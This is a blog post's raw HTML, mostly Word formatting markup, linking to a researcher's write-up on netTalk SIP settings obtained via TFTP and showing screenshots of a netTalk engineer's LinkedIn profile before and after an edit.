<w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 3" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 3" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 3" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 3" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 3" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 3" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 3" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 4" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 4" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 4" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 4" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 4" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 4" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 4" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 4" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 4" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 5" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 5" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 5" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 5" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 5" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 5" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 5" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 5" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 5" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 6" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 6" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 6" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 6" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 6" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 6" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 6" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 6" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 6" /> <w:LsdException Locked="false" Priority="19" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis" /> <w:LsdException Locked="false" Priority="21" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis" /> <w:LsdException Locked="false" Priority="31" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference" /> <w:LsdException Locked="false" Priority="32" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Reference" /> <w:LsdException Locked="false" Priority="33" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Book Title" /> <w:LsdException Locked="false" Priority="37" Name="Bibliography" /> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading" /> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <mce:style><!   /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-priority:99; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin-top:0in; 	mso-para-margin-right:0in; 	mso-para-margin-bottom:10.0pt; 	mso-para-margin-left:0in; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin;} --> <!--[endif] --><span class="postbody"><span style="font-size: 11pt; line-height: 115%; font-family: &quot;Calibri&quot;,&quot;sans-serif&quot;;">Write up of the Researcher’s findings: </span></span><span style="font-size: 11pt; line-height: 115%; font-family: &quot;Calibri&quot;,&quot;sans-serif&quot;;"><a href="http://magicjacksupport.com/nettalk-sip-via-tftp-t10925.html">http://magicjacksupport.com/nettalk-sip-via-tftp-t10925.html</a></span></p>
<p><!--[if gte mso 9]><xml> <o:OfficeDocumentSettings> <o:RelyOnVML /> <o:AllowPNG /> </o:OfficeDocumentSettings> </xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves /> <w:TrackFormatting /> <w:PunctuationKerning /> <w:ValidateAgainstSchemas /> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF /> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables /> <w:SnapToGridInCell /> <w:WrapTextWithPunct /> <w:UseAsianBreakRules /> <w:DontGrowAutofit /> <w:SplitPgBreakAndParaMark /> <w:EnableOpenTypeKerning /> <w:DontFlipMirrorIndents /> <w:OverrideTableStyleHps /> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math" /> <m:brkBin m:val="before" /> <m:brkBinSub m:val="&#45;-" /> <m:smallFrac m:val="off" /> <m:dispDef /> <m:lMargin m:val="0" /> <m:rMargin m:val="0" /> <m:defJc m:val="centerGroup" /> <m:wrapIndent m:val="1440" /> <m:intLim m:val="subSup" /> <m:naryLim m:val="undOvr" /> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"   DefSemiHidden="true" DefQFormat="false" DefPriority="99"   LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Normal" /> <w:LsdException Locked="false" Priority="9" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="heading 1" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9" /> <w:LsdException Locked="false" Priority="39" Name="toc 1" /> <w:LsdException Locked="false" Priority="39" Name="toc 2" /> <w:LsdException Locked="false" Priority="39" Name="toc 3" /> <w:LsdException Locked="false" Priority="39" Name="toc 4" /> <w:LsdException Locked="false" Priority="39" Name="toc 5" /> <w:LsdException Locked="false" Priority="39" Name="toc 6" /> <w:LsdException Locked="false" Priority="39" Name="toc 7" /> <w:LsdException Locked="false" Priority="39" Name="toc 8" /> <w:LsdException Locked="false" Priority="39" Name="toc 9" /> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption" /> <w:LsdException Locked="false" Priority="10" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Title" /> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font" /> <w:LsdException Locked="false" Priority="11" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtitle" /> <w:LsdException Locked="false" Priority="22" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Strong" /> <w:LsdException Locked="false" Priority="20" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Emphasis" /> <w:LsdException Locked="false" Priority="59" SemiHidden="false"    UnhideWhenUsed="false" Name="Table Grid" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text" /> <w:LsdException Locked="false" Priority="1" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="No Spacing" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 1" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 1" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 1" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 1" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision" /> <w:LsdException Locked="false" Priority="34" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="List Paragraph" /> <w:LsdException Locked="false" Priority="29" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Quote" /> <w:LsdException Locked="false" Priority="30" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Quote" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 1" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 1" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 1" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 1" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 1" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 2" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 2" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 2" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 2" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 2" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 2" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 2" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 2" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 3" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 3" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 3" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 3" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 3" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 3" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 3" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 3" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 3" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 4" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 4" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 4" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 4" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 4" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 4" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 4" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 4" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 4" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 5" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 5" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 5" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 5" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 5" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 5" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 5" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 5" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 5" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 6" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 6" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 6" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 6" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 6" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 6" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 6" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 6" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 6" /> <w:LsdException Locked="false" Priority="19" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis" /> <w:LsdException Locked="false" Priority="21" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis" /> <w:LsdException Locked="false" Priority="31" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference" /> <w:LsdException Locked="false" Priority="32" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Reference" /> <w:LsdException Locked="false" Priority="33" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Book Title" /> <w:LsdException Locked="false" Priority="37" Name="Bibliography" /> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading" /> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <mce:style><!   /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-priority:99; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin-top:0in; 	mso-para-margin-right:0in; 	mso-para-margin-bottom:10.0pt; 	mso-para-margin-left:0in; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin;} --> <!--[endif] --></p>
<p class="MsoNormal"><strong><span class="postbody">Screenshots and my personal logs with dates:</span></strong></p>
<p class="MsoNormal"><span class="postbody"><span> </span>On 6/24/2011 I received a LinkedIn invite from a Thomas Hutton a Senior Engineer of nettalk. Since contacting Nettak, Thomas has altered his LinkedIn profile to hide all relations to Nettalk. Through the magic of Google cache here is his profile before edit. Below the before is the after edit.</span></p>
<p class="MsoNormal"><strong><span class="postbody">Before Edit: (Click for larger view)<br />
</span></strong></p>
<p class="MsoNormal"><strong><span class="postbody"><a href="http://www.digitaloffensive.com/wp-content/uploads/2011/06/nettalk1.png"><img class="aligncenter size-medium wp-image-342" title="nettalk1" src="http://www.digitaloffensive.com/wp-content/uploads/2011/06/nettalk1-300x198.png" alt="" width="300" height="198" /></a></span></strong></p>
<p class="MsoNormal"><strong><span class="postbody">After Edit: (Click for larger view)<br />
</span></strong></p>
<p class="MsoNormal"><strong><span class="postbody"><a href="http://www.digitaloffensive.com/wp-content/uploads/2011/06/nettalk2.png"><img class="aligncenter size-medium wp-image-343" title="nettalk2" src="http://www.digitaloffensive.com/wp-content/uploads/2011/06/nettalk2-300x213.png" alt="" width="300" height="213" /></a></span></strong><!--[if gte mso 9]><xml> <o:OfficeDocumentSettings> <o:RelyOnVML /> <o:AllowPNG /> </o:OfficeDocumentSettings> </xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves /> <w:TrackFormatting /> <w:PunctuationKerning /> <w:ValidateAgainstSchemas /> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF /> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables /> <w:SnapToGridInCell /> <w:WrapTextWithPunct /> <w:UseAsianBreakRules /> <w:DontGrowAutofit /> <w:SplitPgBreakAndParaMark /> <w:EnableOpenTypeKerning /> <w:DontFlipMirrorIndents /> <w:OverrideTableStyleHps /> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math" /> <m:brkBin m:val="before" /> <m:brkBinSub m:val="&#45;-" /> <m:smallFrac m:val="off" /> <m:dispDef /> <m:lMargin m:val="0" /> <m:rMargin m:val="0" /> <m:defJc m:val="centerGroup" /> <m:wrapIndent m:val="1440" /> <m:intLim m:val="subSup" /> <m:naryLim m:val="undOvr" /> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"   DefSemiHidden="true" DefQFormat="false" DefPriority="99"   LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Normal" /> <w:LsdException Locked="false" Priority="9" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="heading 1" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9" /> <w:LsdException Locked="false" Priority="39" Name="toc 1" /> <w:LsdException Locked="false" Priority="39" Name="toc 2" /> <w:LsdException Locked="false" Priority="39" Name="toc 3" /> <w:LsdException Locked="false" Priority="39" Name="toc 4" /> <w:LsdException Locked="false" Priority="39" Name="toc 5" /> <w:LsdException Locked="false" Priority="39" Name="toc 6" /> <w:LsdException Locked="false" Priority="39" Name="toc 7" 